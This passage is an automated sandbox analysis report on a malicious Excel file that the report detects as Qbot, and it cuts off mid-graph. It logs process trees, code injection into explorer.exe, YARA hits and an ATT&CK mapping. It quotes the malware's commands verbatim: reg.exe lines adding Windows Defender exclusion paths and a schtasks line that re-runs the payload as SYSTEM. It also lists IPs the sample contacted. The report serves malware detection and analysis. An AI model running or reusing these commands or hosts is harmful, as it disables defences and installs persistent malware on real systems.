                        Source: C:\Windows\System32\reg.exeConsole Write: ................$...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
                        Source: C:\Windows\System32\reg.exeConsole Write: ................$...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........".....N.......(...............
                        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
                        Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ciwuywu' /d '0'
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uvelq' /d '0'
                        Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ciwuywu' /d '0'
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uvelq' /d '0'
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE9D1.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@25/6@0/3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_100030B7 StartServiceCtrlDispatcherA,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_100030B7 StartServiceCtrlDispatcherA,
                        Source: CompensationClaim-1033191014-09282021.xlsOLE indicator, Workbook stream: true
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{6845EBB9-4AF7-4E56-9BB0-ADF569578E37}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{0F905B6A-A27C-4BE3-8678-0B5BD602A8CF}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{86C9B554-6D2D-4099-AD4E-D96AE07D5551}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{6845EBB9-4AF7-4E56-9BB0-ADF569578E37}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{0F905B6A-A27C-4BE3-8678-0B5BD602A8CF}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{86C9B554-6D2D-4099-AD4E-D96AE07D5551}
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.618389279.00000000026B0000.00000004.00000040.sdmp, explorer.exe, 0000000E.00000003.634893726.0000000001350000.00000004.00000040.sdmp
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_02A8455B push edx; mov dword ptr [esp], 00000003h
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_02A8455B push edx; mov dword ptr [esp], 00F00000h
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_02A81000 push eax; mov dword ptr [esp], 000FFFFFh
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001A00E push ebx; ret
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001D485 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001D4B6 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10019D5C push cs; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10019E5E push cs; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001BB29 push esi; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009A00E push ebx; ret
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009D485 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009D4B6 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00099D5C push cs; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00099E5E push cs; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009BB29 push esi; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_01311000 push eax; mov dword ptr [esp], 000FFFFFh
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0131455B push edx; mov dword ptr [esp], 00000003h
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0131455B push edx; mov dword ptr [esp], 00F00000h
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1001A00E push ebx; ret
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1001D485 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1001D4B6 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_10019D5C push cs; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_10019E5E push cs; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1001BB29 push esi; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000DA00E push ebx; ret
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000DD485 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000DD4B6 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D9D5C push cs; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D9E5E push cs; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000DBB29 push esi; iretd
                        Source: 44467.9218096065[1].dat.0.drStatic PE information: section name: .rdatat
                        Source: Drezd.red.0.drStatic PE information: section name: .rdatat
                        Source: Drezd.red.7.drStatic PE information: section name: .rdatat
                        Source: Drezd.red.14.drStatic PE information: section name: .rdatat
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000DFAD LoadLibraryA,GetProcAddress,

                        Persistence and Installation Behavior:

                        barindex
                        Uses cmd line tools excessively to alter registry or file dataShow sources
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd.red
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.red
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.9218096065[1].datJump to dropped file
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file

                        Boot Survival:

                        barindex
                        Drops PE files to the user root directoryShow sources
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
                        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_100030B7 StartServiceCtrlDispatcherA,

                        Hooking and other Techniques for Hiding and Protection:

                        barindex
                        Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2980 base: 29102D value: E9 BA 4C DF FF
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2136 base: 29102D value: E9 BA 4C E3 FF
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1308Thread sleep count: 50 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 1612Thread sleep time: -100000s >= -30000s
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1708Thread sleep count: 53 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 2580Thread sleep count: 69 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 2580Thread sleep time: -88000s >= -30000s
                        Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.9218096065[1].datJump to dropped file
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0008AEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000DFAD LoadLibraryA,GetProcAddress,
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00085A61 RtlAddVectoredExceptionHandler,
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000C5A61 RtlAddVectoredExceptionHandler,

                        HIPS / PFW / Operating System Protection Evasion:

                        barindex
                        Maps a DLL or memory area into another processShow sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                        Writes to foreign memory regionsShow sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 29102D
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F0000
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 29102D
                        Allocates memory in foreign processesShow sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write
                        Injects code into the Windows Explorer (explorer.exe)Show sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2980 base: B0000 value: 9C
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2980 base: 29102D value: E9
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2136 base: F0000 value: 9C
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2136 base: 29102D value: E9
                        Yara detected hidden Macro 4.0 in ExcelShow sources
                        Source: Yara matchFile source: CompensationClaim-1033191014-09282021.xls, type: SAMPLE
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ciwuywu' /d '0'
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uvelq' /d '0'
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: explorer.exe, 00000007.00000002.881631328.0000000000C40000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: explorer.exe, 00000007.00000002.881631328.0000000000C40000.00000002.00020000.sdmpBinary or memory string: !Progman
                        Source: explorer.exe, 00000007.00000002.881631328.0000000000C40000.00000002.00020000.sdmpBinary or memory string: Program Manager<
                        Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000831C2 CreateNamedPipeA,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected QbotShow sources
                        Source: Yara matchFile source: 6.2.regsvr32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.regsvr32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.regsvr32.exe.2a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.explorer.exe.c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.617600278.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.615656945.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.634139082.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.881366079.0000000000080000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.881374188.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.632447302.00000000002A0000.00000004.00000001.sdmp, type: MEMORY

                        Remote Access Functionality:

                        barindex
                        Yara detected QbotShow sources
                        Source: Yara matchFile source: 6.2.regsvr32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.regsvr32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.regsvr32.exe.2a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.explorer.exe.c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.617600278.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.615656945.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.634139082.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.881366079.0000000000080000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.881374188.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.632447302.00000000002A0000.00000004.00000001.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsCommand and Scripting Interpreter11Windows Service3Windows Service3Masquerading121Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection413Disable or Modify Tools1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsScripting2Logon Script (Windows)Scheduled Task/Job1Modify Registry1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsService Execution2Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion1NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsNative API1Network Logon ScriptNetwork Logon ScriptProcess Injection413LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaExploitation for Client Execution32Rc.commonRc.commonScripting2Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 492656 Sample: CompensationClaim-103319101... Startdate: 28/09/2021 Architecture: WINDOWS Score: 100 54 Found malware configuration 2->54 56 Multi AV Scanner detection for dropped file 2->56 58 Document exploit detected (drops PE files) 2->58 60 8 other signatures 2->60 9 EXCEL.EXE 194 32 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 48 94.140.112.126, 80 TELEMACHBroadbandAccessCarrierServicesSI Latvia 9->48 50 190.14.37.187, 49165, 80 OffshoreRacksSAPA Panama 9->50 52 185.141.27.213, 80 HSAE Netherlands 9->52 46 C:\Users\user\...\44467.9218096065[1].dat, PE32 9->46 dropped 76 Document exploit detected (UrlDownloadToFile) 9->76 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        27 regsvr32.exe 16->27         started        file5 signatures6 process7 signatures8 29 regsvr32.exe 18->29         started        68 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->68 70 Injects code into the Windows Explorer (explorer.exe) 24->70 72 Writes to foreign memory regions 24->72 74 2 other signatures 24->74 32 explorer.exe 8 1 24->32         started        process9 file10 78 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 29->78 80 